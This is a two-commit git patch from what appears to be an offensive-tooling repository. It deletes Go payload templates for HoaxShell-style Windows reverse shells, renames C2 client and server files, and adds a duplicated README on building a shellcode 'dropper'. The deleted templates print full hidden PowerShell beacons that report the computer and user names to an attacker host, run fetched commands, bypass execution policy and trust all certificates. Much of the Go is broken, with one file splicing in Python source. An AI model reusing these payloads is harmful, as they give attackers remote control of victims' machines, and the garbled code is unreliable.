From 78702313b6c52d00b494f14934298e27cea10914 Mon Sep 17 00:00:00 2001 
From: xXIamNoOneXx <143564810+xXIamNoOneXx@users.noreply.github.com>
Date: Mon, 4 Sep 2023 17:17:02 -0500
Subject: [PATCH 1/2] committed
---
.github/FUNDING.yml | 13 --
.github/workflows/terraform.yml | 93 --------------
.../windows/hoaxshell/cmd_curl.go | 48 -------
.../windows/hoaxshell/cmd_curl_https.go | 48 -------
.../windows/hoaxshell/powershell_iex.go | 72 -----------
.../hoaxshell/powershell_iex_constr_lang.go | 72 -----------
.../windows/hoaxshell/powershell_iex_https.go | 120 ------------------
.../windows/hoaxshell/powershell_outfile.go | 84 ------------
.../powershell_outfile_constraint.go | 84 ------------
cistom_shell.asm => asm/cistom_shell.asm | 0
c2_client.py => client/c2_client.py | 0
simple_server.cpp => cpp/simple_server.cpp | 0
main.tf | 1 -
c2_server.py => server/c2_server.py | 0
14 files changed, 635 deletions(-)
delete mode 100644 .github/FUNDING.yml
delete mode 100644 .github/workflows/terraform.yml
delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go
delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go
delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go
delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go
delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go
delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go
delete mode 100644 Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go
rename cistom_shell.asm => asm/cistom_shell.asm (100%)
rename c2_client.py => client/c2_client.py (100%)
rename simple_server.cpp => cpp/simple_server.cpp (100%)
delete mode 100644 main.tf
rename c2_server.py => server/c2_server.py (100%)
diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
deleted file mode 100644
index 1e47970..0000000
--- a/.github/FUNDING.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-# These are supported funding model platforms
-
-github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
-patreon: # Replace with a single Patreon username
-open_collective: # Replace with a single Open Collective username
-ko_fi: # Replace with a single Ko-fi username
-tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
-community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
-liberapay: # Replace with a single Liberapay username
-issuehunt: # Replace with a single IssueHunt username
-otechie: # Replace with a single Otechie username
-lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
-custom: ['@CashApp $IamStillNoOne @John Smith', 'link2']
diff --git a/.github/workflows/terraform.yml b/.github/workflows/terraform.yml
deleted file mode 100644
index 3b97a8e..0000000
--- a/.github/workflows/terraform.yml
+++ /dev/null
@@ -1,93 +0,0 @@
-# This workflow installs the latest version of Terraform CLI and configures the Terraform CLI configuration file
-# with an API token for Terraform Cloud (app.terraform.io). On pull request events, this workflow will run
-# `terraform init`, `terraform fmt`, and `terraform plan` (speculative plan via Terraform Cloud). On push events
-# to the "main" branch, `terraform apply` will be executed.
-#
-# Documentation for `hashicorp/setup-terraform` is located here: https://github.com/hashicorp/setup-terraform
-#
-# To use this workflow, you will need to complete the following setup steps.
-#
-# 1. Create a `main.tf` file in the root of this repository with the `remote` backend and one or more resources defined.
-# Example `main.tf`:
-# # The configuration for the `remote` backend.
-# terraform {
-# backend "remote" {
-# # The name of your Terraform Cloud organization.
-# organization = "example-organization"
-#
-# # The name of the Terraform Cloud workspace to store Terraform state files in.
-# workspaces {
-# name = "example-workspace"
-# }
-# }
-# }
-#
-# # An example resource that does nothing.
-# resource "null_resource" "example" {
-# triggers = {
-# value = "A example resource that does nothing!"
-# }
-# }
-#
-#
-# 2. Generate a Terraform Cloud user API token and store it as a GitHub secret (e.g. TF_API_TOKEN) on this repository.
-# Documentation:
-# - https://www.terraform.io/docs/cloud/users-teams-organizations/api-tokens.html
-# - https://help.github.com/en/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets
-#
-# 3. Reference the GitHub secret in step using the `hashicorp/setup-terraform` GitHub Action.
-# Example:
-# - name: Setup Terraform
-# uses: hashicorp/setup-terraform@v1
-# with:
-# cli_config_credentials_token: ${{ secrets.TF_API_TOKEN }}
-
-name: 'Terraform'
-
-on:
- push:
- branches: [ "main" ]
- pull_request:
-
-permissions:
- contents: read
-
-jobs:
- terraform:
- name: 'Terraform'
- runs-on: ubuntu-latest
- environment: production
-
- # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
- defaults:
- run:
- shell: bash
-
- steps:
- # Checkout the repository to the GitHub Actions runner
- - name: Checkout
- uses: actions/checkout@v3
-
- # Install the latest version of Terraform CLI and configure the Terraform CLI configuration file with a Terraform Cloud user API token
- - name: Setup Terraform
- uses: hashicorp/setup-terraform@v1
- with:
- cli_config_credentials_token: ${{ secrets.TF_API_TOKEN }}
-
- # Initialize a new or existing Terraform working directory by creating initial files, loading any remote state, downloading modules, etc.
- - name: Terraform Init
- run: terraform init
-
- # Checks that all Terraform configuration files adhere to a canonical format
- - name: Terraform Format
- run: terraform fmt -check
-
- # Generates an execution plan for Terraform
- - name: Terraform Plan
- run: terraform plan -input=false
-
- # On push to "main", build or change infrastructure according to Terraform configuration files
- # Note: It is recommended to set up a required "strict" status check in your repository for "Terraform Cloud". See the documentation on "strict" required status checks for more information: https://help.github.com/en/github/administering-a-repository/types-of-required-status-checks
- - name: Terraform Apply
- if: github.ref == 'refs/heads/"main"' && github.event_name == 'push'
- run: terraform apply -auto-approve -input=false
diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go
deleted file mode 100644
index d331cd7..0000000
--- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl.go
+++ /dev/null
@@ -1,48 +0,0 @@
-package main
-
-import (
- "fmt"
- "os"
- "os/exec"
- "strings"
- "time"
-)
-
-var info = map[string]string{
- "Title": "Windows CMD cURL HoaxShell",
- "Author": "Panagiotis Chartas (t3l3machus)",
- "Description": "An Http based beacon-like reverse shell that utilizes cURL",
- "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com",
-}
-
-var meta = map[string]string{
- "handler": "hoaxshell",
- "type": "cmd-curl",
- "os": "windows",
- "shell": "cmd.exe",
-}
-
-var config = map[string]int{
- "frequency": 1,
-}
-
-var parameters = map[string]interface{}{
- "lhost": nil,
-}
-
-var attrs = map[string]interface{}{}
-
-func main() {
- lhost := parameters["lhost"].(string)
- ip := strings.Replace(data, "*LHOST*", lhost, -1)
- cmd := exec.Command("cmd", "/C", ip)
- cmd.Stdout = os.Stdout
- cmd.Stderr = os.Stderr
- cmd.Run()
-
- frequency := config["frequency"]
- for {
- cmd := exec.Command("timeout", "/T", fmt.Sprintf("%d", frequency))
- cmd.Run()
- }
-}
diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go
deleted file mode 100644
index 098ac9e..0000000
--- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/cmd_curl_https.go
+++ /dev/null
@@ -1,48 +0,0 @@
-package main
-
-import (
- "fmt"
- "os"
- "os/exec"
- "strings"
- "time"
-)
-
-var info = map[string]string{
- "Title": "Windows CMD cURL HoaxShell https",
- "Author": "Panagiotis Chartas (t3l3machus)",
- "Description": "An Https based beacon-like reverse shell that utilizes cURL",
- "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com",
-}
-
-var meta = map[string]string{
- "handler": "hoaxshell",
- "type": "cmd-curl-ssl",
- "os": "windows",
- "shell": "cmd.exe",
-}
-
-var config = map[string]int{
- "frequency": 1,
-}
-
-var parameters = map[string]interface{}{
- "lhost": nil,
-}
-
-var attrs = map[string]interface{}{}
-
-func main() {
- lhost := parameters["lhost"].(string)
- ip := strings.Replace(data, "*LHOST*", lhost, -1)
- cmd := exec.Command("cmd", "/C", ip)
- cmd.Stdout = os.Stdout
- cmd.Stderr = os.Stderr
- cmd.Run()
-
- frequency := config["frequency"]
- for {
- cmd := exec.Command("timeout", "/T", fmt.Sprintf("%d", frequency))
- cmd.Run()
- }
-}
diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go
deleted file mode 100644
index 6313e90..0000000
--- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex.go
+++ /dev/null
@@ -1,72 +0,0 @@
-package main
-
-import (
- "fmt"
- "os"
- "os/exec"
- "strings"
- "time"
-)
-
-var info = map[string]string{
- "Title": "Windows PowerShell IEX HoaxShell",
- "Author": "Panagiotis Chartas (t3l3machus)",
- "Description": "An Http based beacon-like reverse shell that utilizes IEX",
- "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com",
-}
-
-var meta = map[string]string{
- "handler": "hoaxshell",
- "type": "ps-iex",
- "os": "windows",
- "shell": "powershell.exe",
-}
-
-var config = map[string]float64{
- "frequency": 0.8,
-}
-
-var parameters = map[string]interface{}{
- "lhost": nil,
-}
-
-var attrs = map[string]interface{}{
- "obfuscate": true,
- "encode": true,
-}
-
-var data = `
-Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList {
- $ConfirmPreference="None";
- $s='*LHOST*';
- $i='*SESSIONID*';
- $p='http://';
- $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i};
- for (;;) {
- $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i});
- if ($c -ne 'None') {
- $r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;
- $r=Out-String -InputObject $r;
- $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
- }
- Start-Sleep -Seconds *FREQ*
- }
-} -WindowStyle Hidden
-`
-
-func main() {
- lhost := parameters["lhost"].(string)
- data := strings.Replace(data, "*LHOST*", lhost, -1)
- data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID
-
- cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data)
- cmd.Stdout = os.Stdout
- cmd.Stderr = os.Stderr
- cmd.Run()
-
- frequency := config["frequency"]
- for {
- cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency))
- cmd.Run()
- }
-}
diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go
deleted file mode 100644
index 604d5d2..0000000
--- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_constr_lang.go
+++ /dev/null
@@ -1,72 +0,0 @@
-package main
-
-import (
- "fmt"
- "os"
- "os/exec"
- "strings"
- "time"
-)
-
-var info = map[string]string{
- "Title": "Windows PowerShell IEX HoaxShell - Constraint Language Mode",
- "Author": "Panagiotis Chartas (t3l3machus)",
- "Description": "An Http based beacon-like reverse shell that utilizes IEX and will work even if Constraint Language Mode is enabled on the victim",
- "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com",
-}
-
-var meta = map[string]string{
- "handler": "hoaxshell",
- "type": "ps-iex-cm",
- "os": "windows",
- "shell": "powershell.exe",
-}
-
-var config = map[string]float64{
- "frequency": 0.8,
-}
-
-var parameters = map[string]interface{}{
- "lhost": nil,
-}
-
-var attrs = map[string]interface{}{
- "obfuscate": true,
- "encode": true,
-}
-
-var data = `
-Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList {
- $ConfirmPreference='None';
- $s='*LHOST*';
- $i='*SESSIONID*';
- $p='http://';
- $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i};
- for (;;) {
- $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i});
- if ($c -ne 'None') {
- $r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;
- $r=Out-String -InputObject $r;
- $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ($e+$r)
- }
- Start-Sleep -Seconds *FREQ*
- }
-} -WindowStyle Hidden
-`
-
-func main() {
- lhost := parameters["lhost"].(string)
- data := strings.Replace(data, "*LHOST*", lhost, -1)
- data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID
-
- cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data)
- cmd.Stdout = os.Stdout
- cmd.Stderr = os.Stderr
- cmd.Run()
-
- frequency := config["frequency"]
- for {
- cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency))
- cmd.Run()
- }
-}
diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go
deleted file mode 100644
index 0b4764e..0000000
--- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_iex_https.go
+++ /dev/null
@@ -1,120 +0,0 @@ -# This module is part of the Villain framework - -class Payload: - - info = { - 'Title' : 'Windows PowerShell IEX HoaxShell https', - 'Author' : 'Panagiotis Chartas (t3l3machus)', - 'Description' : 'An Https based beacon-like reverse shell that utilizes IEX', - 'References' : ['https://github.com/t3l3machus/hoaxshell', 'https://revshells.com']package main - -import ( - "fmt" - "os" - "os/exec" - "strings" - "time" -) - -var info = map[string]string{ - "Title": "Windows PowerShell IEX HoaxShell https", - "Author": "Panagiotis Chartas (t3l3machus)", - "Description": "An Https based beacon-like reverse shell that utilizes IEX", - "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com", -} - -var meta = map[string]string{ - "handler": "hoaxshell", - "type": "ps-iex-ssl", - "os": "windows", - "shell": "powershell.exe", -} - -var config = map[string]float64{ - "frequency": 0.8, -} - -var parameters = map[string]interface{}{ - "lhost": nil, -} - -var attrs = map[string]interface{}{ - "obfuscate": true, - "encode": true, -} - -var data = ` -Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList { - add-type @" - using System.Net;using System.Security.Cryptography.X509Certificates; - public class TrustAllCertsPolicy : ICertificatePolicy { - public bool CheckValidationResult( - ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) { - return true; - } - } - "@ - [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy - $ConfirmPreference="None"; - $s='*LHOST*'; - $i='*SESSIONID*'; - $p='https://'; - $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i}; - for (;;) { - $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i}); - if ($c -ne 'None') { - $r=iex $c -ErrorAction Stop -ErrorVariable e; - $r=Out-String -InputObject $r; - 
$x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ') - } - Start-Sleep -Seconds *FREQ* - } -} -WindowStyle Hidden -` - -func main() { - lhost := parameters["lhost"].(string) - data := strings.Replace(data, "*LHOST*", lhost, -1) - data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID - - cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data) - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - cmd.Run() - - frequency := config["frequency"] - for { - cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency)) - cmd.Run() - } -} - - } - - meta = { - 'handler' : 'hoaxshell', - 'type' : 'ps-iex-ssl', - 'os' : 'windows', - 'shell' : 'powershell.exe' - } - - config = { - 'frequency' : 0.8 - } - - parameters = { - 'lhost' : None - } - - attrs = { - 'obfuscate' : True, - 'encode' : True - } - - data = '''Start-Process $PSHOME\powershell.exe -ArgumentList {add-type @" -using System.Net;using System.Security.Cryptography.X509Certificates; -public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( -ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} -"@ -[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy -$ConfirmPreference="None";$s=\'*LHOST*\';$i=\'*SESSIONID*\';$p=\'https://\';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME -Headers @{"*HOAXID*"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/*GETCMD* -Headers @{"*HOAXID*"=$i});if ($c -ne \'None\') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/*POSTRES* -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join \' \')} sleep *FREQ*}} -WindowStyle Hidden''' 
diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go
deleted file mode 100644
index 18c328b..0000000
--- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile.go
+++ /dev/null
@@ -1,84 +0,0 @@
-package main
-
-import (
- "fmt"
- "io/ioutil"
- "os"
- "os/exec"
- "strings"
- "time"
-)
-
-var info = map[string]string{
- "Title": "Windows PowerShell outfile HoaxShell",
- "Author": "Panagiotis Chartas (t3l3machus)",
- "Description": "An Http based beacon-like reverse shell that writes and executes commands from disc",
- "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com",
-}
-
-var meta = map[string]string{
- "handler": "hoaxshell",
- "type": "ps-outfile",
- "os": "windows",
- "shell": "powershell.exe",
-}
-
-var config = map[string]float64{
- "frequency": 0.8,
-}
-
-var parameters = map[string]interface{}{
- "lhost": nil,
-}
-
-var attrs = map[string]interface{}{
- "obfuscate": true,
- "encode": true,
-}
-
-var data = `
-Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList {
- $ConfirmPreference='None';
- $s='*LHOST*';
- $i='*SESSIONID*';
- $p='http://';
- $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i};
- for (;;) {
- $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i});
- if (!(@('None','quit') -contains $c)) {
- $c | Out-File -FilePath "*OUTFILE*";
- $r=powershell -ep bypass *OUTFILE* -ErrorAction Stop -ErrorVariable e;
- $r=Out-String -InputObject $r;
- $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
- } elseif ($c -eq 'quit') {
- Remove-Item "*OUTFILE*";
- Stop-Process $PID
- }
- Start-Sleep -Seconds *FREQ*
- }
-} -WindowStyle Hidden
-`
-
-func main() {
- lhost := parameters["lhost"].(string)
- data := strings.Replace(data, "*LHOST*", lhost, -1)
- data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID
-
- // Define the path for the outfile
- outfilePath := "C:\\Users\\" + os.Getenv("USERNAME") + "\\.local\\haxor.ps1"
- data = strings.Replace(data, "*OUTFILE*", outfilePath, -1)
-
- // Create the outfile and write the data
- ioutil.WriteFile(outfilePath, []byte(data), 0644)
-
- cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data)
- cmd.Stdout = os.Stdout
- cmd.Stderr = os.Stderr
- cmd.Run()
-
- frequency := config["frequency"]
- for {
- cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency))
- cmd.Run()
- }
-}
diff --git a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go b/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go
deleted file mode 100644
index 6255273..0000000
--- a/Core/payload_templates/windows/hoaxshell/Core/payload_templates/windows/hoaxshell/powershell_outfile_constraint.go
+++ /dev/null
@@ -1,84 +0,0 @@
-package main
-
-import (
- "fmt"
- "io/ioutil"
- "os"
- "os/exec"
- "strings"
- "time"
-)
-
-var info = map[string]string{
- "Title": "Windows PowerShell outfile HoaxShell - Constraint Language Mode",
- "Author": "Panagiotis Chartas (t3l3machus)",
- "Description": "An Http based beacon-like reverse shell that writes and executes commands from disc and will work even if Constraint Language Mode is enabled on the victim",
- "References": "https://github.com/t3l3machus/hoaxshell, https://revshells.com",
-}
-
-var meta = map[string]string{
- "handler": "hoaxshell",
- "type": "ps-outfile-cm",
- "os": "windows",
- "shell": "powershell.exe",
-}
-
-var config = map[string]float64{
- "frequency": 0.8,
-}
-
-var parameters = map[string]interface{}{
- "lhost": nil,
-}
-
-var attrs = map[string]interface{}{
- "obfuscate": true,
- "encode": true,
-}
-
-var data = `
-Start-Process $env:windir\sysnative\WindowsPowerShell\v1.0\powershell.exe -ArgumentList {
- $ConfirmPreference='None';
- $s='*LHOST*';
- $i='*SESSIONID*';
- $p='http://';
- $v=Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*VERIFY*/$env:COMPUTERNAME/$env:USERNAME" -Headers @{"*HOAXID*"=$i};
- for (;;) {
- $c=(Invoke-RestMethod -UseBasicParsing -Uri "$p$s/*GETCMD*" -Headers @{"*HOAXID*"=$i});
- if (!(@('None','quit') -contains $c)) {
- $c | Out-File -FilePath "*OUTFILE*";
- $r=powershell -ep bypass *OUTFILE* -ErrorAction Stop -ErrorVariable e;
- $r=Out-String -InputObject $r;
- $x=Invoke-RestMethod -Uri "$p$s/*POSTRES*" -Method POST -Headers @{"*HOAXID*"=$i} -Body ($e+$r)
- } elseif ($c -eq 'quit') {
- Remove-Item "*OUTFILE*";
- Stop-Process $PID
- }
- Start-Sleep -Seconds *FREQ*
- }
-} -WindowStyle Hidden
-`
-
-func main() {
- lhost := parameters["lhost"].(string)
- data := strings.Replace(data, "*LHOST*", lhost, -1)
- data := strings.Replace(data, "*SESSIONID*", "session123", -1) // Replace with actual session ID
-
- // Define the path for the outfile
- outfilePath := "C:\\Users\\" + os.Getenv("USERNAME") + "\\.local\\haxor.ps1"
- data = strings.Replace(data, "*OUTFILE*", outfilePath, -1)
-
- // Create the outfile and write the data
- ioutil.WriteFile(outfilePath, []byte(data), 0644)
-
- cmd := exec.Command("powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", data)
- cmd.Stdout = os.Stdout
- cmd.Stderr = os.Stderr
- cmd.Run()
-
- frequency := config["frequency"]
- for {
- cmd := exec.Command("timeout", "/T", fmt.Sprintf("%.0f", frequency))
- cmd.Run()
- }
-}
diff --git a/cistom_shell.asm b/asm/cistom_shell.asm
similarity index 100%
rename from cistom_shell.asm
rename to asm/cistom_shell.asm
diff --git a/c2_client.py b/client/c2_client.py
similarity index 100%
rename from c2_client.py
rename to client/c2_client.py
diff --git a/simple_server.cpp b/cpp/simple_server.cpp
similarity index 100%
rename from simple_server.cpp
rename to cpp/simple_server.cpp
diff --git a/main.tf b/main.tf
deleted file mode 100644
index 8b13789..0000000
--- a/main.tf
+++ /dev/null
@@ -1 +0,0 @@
-
diff --git a/c2_server.py b/server/c2_server.py
similarity index 100%
rename from c2_server.py
rename to server/c2_server.py
From 6e9318dd5bfd3ea47bd68a7aa210b272cf6bf886 Mon Sep 17 00:00:00 2001
From: xXIamNoOneXx <143564810+xXIamNoOneXx@users.noreply.github.com>
Date: Mon, 4 Sep 2023 17:21:04 -0500
Subject: [PATCH 2/2] added dropper readme
---
README-dropper.md | 123 ++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 123 insertions(+)
create mode 100644 README-dropper.md
diff --git a/README-dropper.md b/README-dropper.md
new file mode 100644
index 0000000..c12a47f
--- /dev/null
+++ b/README-dropper.md
@@ -0,0 +1,123 @@ +Here's how you can assemble and link the assembly files: + + Save the Assembly Code: + + Save your dropper.asm and shellcode.asm files with the code you want to use. + + Assemble the Code: + + Open your terminal and navigate to the directory where your assembly files are located. + + To assemble each assembly file, use the as (GNU Assembler) command: + + bash + +as -o dropper.o dropper.asm +as -o shellcode.o shellcode.asm + +This command assembles the code in dropper.asm and shellcode.asm and generates object files (dropper.o and shellcode.o). + +Link the Code: + +Once you have the object files, you can link them into an executable. Create a linker script (e.g., linker.ld) to specify the entry point: + +ld + +ENTRY(_start) + +SECTIONS { + . = 0x08048000; /* This is the default ELF load address for executables */ + + .text : { + *(.text) + } + + .data : { + *(.data) + } + + .bss : { + *(.bss) + } +} + +Now, link the object files using the linker: + +bash + +ld -T linker.ld -o dropper dropper.o shellcode.o + +This command links the object files into an executable named dropper. + +Run the Executable: + +You can now run the dropper executable: + +bash + + ./dropper + + This will execute your custom shellcode. + +Please adapt the above steps as needed for your specific environment and requirements. Note that the above commands are for a Linux environment, and the process may differ if you are working on Windows or another platformHere's how you can assemble and link the assembly files: + + Save the Assembly Code: + + Save your dropper.asm and shellcode.asm files with the code you want to use. + + Assemble the Code: + + Open your terminal and navigate to the directory where your assembly files are located. 
+ + To assemble each assembly file, use the as (GNU Assembler) command: + + bash + +as -o dropper.o dropper.asm +as -o shellcode.o shellcode.asm + +This command assembles the code in dropper.asm and shellcode.asm and generates object files (dropper.o and shellcode.o). + +Link the Code: + +Once you have the object files, you can link them into an executable. Create a linker script (e.g., linker.ld) to specify the entry point: + +ld + +ENTRY(_start) + +SECTIONS { + . = 0x08048000; /* This is the default ELF load address for executables */ + + .text : { + *(.text) + } + + .data : { + *(.data) + } + + .bss : { + *(.bss) + } +} + +Now, link the object files using the linker: + +bash + +ld -T linker.ld -o dropper dropper.o shellcode.o + +This command links the object files into an executable named dropper. + +Run the Executable: + +You can now run the dropper executable: + +bash + + ./dropper + + This will execute your custom shellcode. + +Please adapt the above steps as needed for your specific environment and requirements. Note that the above commands are for a Linux environment, and the process may differ if you are working on Windows or another platform \ No newline at end of file